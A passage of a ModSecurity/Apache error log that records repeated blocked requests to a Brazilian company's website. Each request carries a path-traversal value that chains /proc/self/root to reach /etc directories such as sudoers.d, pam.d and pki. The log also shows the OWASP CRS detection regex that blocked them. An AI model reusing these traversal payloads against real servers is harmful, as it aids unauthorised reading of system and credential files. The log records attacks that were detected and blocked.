"abqNp9a6ubjKNq_cu4aBXgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:00.899024 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:38792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNqPu8EFLIOrSqIpvuJgAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:01.114485 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:55690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNqeoXxyEfFpUF8f9XzAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:34:02.515225 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:38802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNqtY0UrI5A3LftIyJlAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:03.819640 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:38818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNq0zinOy1jxa1j4f8OAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:06.446795 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:38822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNrdY0UrI5A3LftIyJmQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:08.411564 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:38824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNsNa6ubjKNq_cu4aBYwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:10.326609 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:58732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNsuyqAr6etmhZHNqm6AAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:11.763541 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:58748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNs-w_le52K8_3pV3JXgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:13.046866 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:58764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNtew_le52K8_3pV3JXwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:14.343213 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:58770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNtuoXxyEfFpUF8f9X1AAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:15.690177 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:58776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNt0zinOy1jxa1j4f8QgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:17.848059 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:58778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNuOyqAr6etmhZHNqm8AAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:19.418946 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:37584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNu-yqAr6etmhZHNqm9AAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:23.524319 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:37592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNv-yqAr6etmhZHNqm_gAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:25.588166 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:37602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNwOw_le52K8_3pV3JYwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:27.151079 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:37610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNw0zinOy1jxa1j4f8XQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:28.687415 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:37626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNxNY0UrI5A3LftIyJpwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:30.033847 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:59362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNximAPhZkrhU8w4lWWAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:31.413246 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:59370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNx8df6f5d65gmYZS9NwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:33.859282 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:59380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNyda6ubjKNq_cu4aBcgAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:35.226825 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:59386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNy-oXxyEfFpUF8f9X3wAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:34:36.706268 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:59388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 